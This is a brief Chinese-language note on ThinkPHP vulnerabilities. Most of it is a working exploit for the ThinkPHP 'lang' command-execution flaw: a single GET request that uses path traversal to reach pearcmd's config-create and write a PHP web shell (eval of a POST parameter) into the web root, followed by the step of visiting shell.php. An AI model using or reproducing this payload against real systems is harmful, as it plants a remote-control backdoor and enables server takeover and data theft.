Thinkphp相关漏洞

Thinkphp版本主要有3、5、6，相关漏洞比较多，可以使用两款工具来探测。

 

工具未集成的漏洞存在thinkphp lang 命令执行

thinkphp lang 命令执行

环境启动

 PAYLOAD

GET /public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=@eval($_POST['cmd']);?>+/var/www/html/shell.php HTTP/1.1

 

 

 之后访问shell.php